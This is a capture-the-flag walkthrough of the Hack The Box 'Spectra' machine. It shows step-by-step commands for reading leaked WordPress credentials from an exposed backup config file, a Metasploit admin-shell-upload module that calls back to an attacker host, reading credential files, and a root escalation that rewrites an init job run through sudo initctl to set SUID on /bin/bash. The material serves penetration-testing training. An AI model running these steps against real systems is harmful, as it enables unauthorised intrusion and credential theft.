Today we are going to accept the boot2root challenge of Spectra –Hack the box lab. Through this lab, we are going to check our skills in WordPress Exploitation and basic privilege escalation.

Table Of Content

Reconnaissance

• Nmap

Enumeration

• Website enumeration

Exploitation

• WordPress Metasploit

Privilege Escalation

• Abusing Sudo rights

Reconnaissance

Let’s start our journey.

nmap –A  10.129.223.138

Through Nmap scan, we get to know that there are three open ports i.e. Port 22 –SSH version OpenSSH 8.1, Port 80 –HTTP, and port 3306 –MySQL.

First, we are exploring Port 80 in the web browser, and get a simple page with having two links Software Issue Tracker and Test.

http:10.129.223.138

Enumeration

Both links Redirected to spectra.htb, so We need to edit the host file.

cat /etc/hosts

Now we will try to explore both links found after navigating port 80. Once we click on the test link we get the “error establishing a database connection”. It seems nothing important.

We navigate spectra.htb/testing in the web browser and we find two wordpress config files i.e wp-config.php  and wp-config.php.save.

Wp-config.php.save is the base configuration file for WordPress.After access it through curl we find something interesting in it i.eMYSQL database credential’s username ‘devtest’ and password devteam01

curl http://spectra.htb/testing/wp-config.php.save

Happily, we login the WordPress but unfortunately, the above-found credentials are not working, and getting the error” Unknown username. Check again or try your email address”.

spectra.htb/main/wp-login.php

Looking back, now it’s time to explore the first link software issue tracker found on HTTP 80.

This leads us to a basic WordPress page with the administrator’s sample post. We learn from this that the username “Administrator” is a viable option. We go to the wp-login page once more to log in.

Great!! Successfully we logged in and it redirects to the administration email verification.

Just click on “This email is correct” and get into it.

Exploitation

After some enumeration, we find that the WordPress version is not updated. Accordingly, we explore the Metasploit exploit and set the required options as we have already fetched the username and password i.e. administrator and devteam01 respectively. Below is the module:

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 10.129.223.138
set targeturi /main
set password devteam01
set lhost 10.10.14.100
exploit

While doing enumeration, we come across there is another user name as “Katie”.

cat /etc/passwd

Very soon we decide that user Katie does not have permission to access user.txt.

cd /home/katie
ls
cat user.txt

After some file enumeration, an intriguing script autologin.conf.orig find in the /opt/ directory

cd opt
ls -la

This script retrieves a password from the passwd file in the /etc/autologin directory.

cat autologin.config.orig

I navigate to the file and grab the password. Next, I try the password against my list of users found above.

cd /etc/autologin
ls -la
cat passwd

Privilege Escalation

Let’s utilise the credential we enumerated for user Katie to log into SSH. We discovered that Katie is a member of the developer’s group using the id command. We next checked Katie’s sudo rights and discovered that user can run /sbin/initctl as root. Initctl is a linux init daemon control utility.

ssh katie@10.129.223.138
id
sudo –l
find / -type f –group developers 2>dev/null –ls
cat /etc/init/test.conf

Let’s abuse test.conf file and replace the existing content with the following line that will enable SUID bit for /bin/bash.

chmod +s /bin/bash
end script

We can use Katie’s privilege to start test.conf, which will run the script to enable the SUID permission on /bin/bash, because user has root permission to run initctl.

sudo /sbin/initctl start test
/bin/bash –p

Kudos!! Finally, we capture the ROOT flag after obtaining the root privilege shell.

Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here